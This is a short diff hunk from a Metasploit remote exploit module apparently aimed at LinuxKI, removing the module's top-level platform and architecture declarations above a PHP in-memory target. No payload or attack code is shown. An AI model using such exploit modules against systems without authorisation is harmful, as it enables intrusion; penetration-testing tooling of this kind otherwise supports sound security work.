@@ -33,8 +33,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
         ],
         'Privileged' => false,
-        'Platform' => ['php', 'unix', 'linux'],
-        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
         'Targets' => [
           [
             'Automatic (PHP In-Memory)',
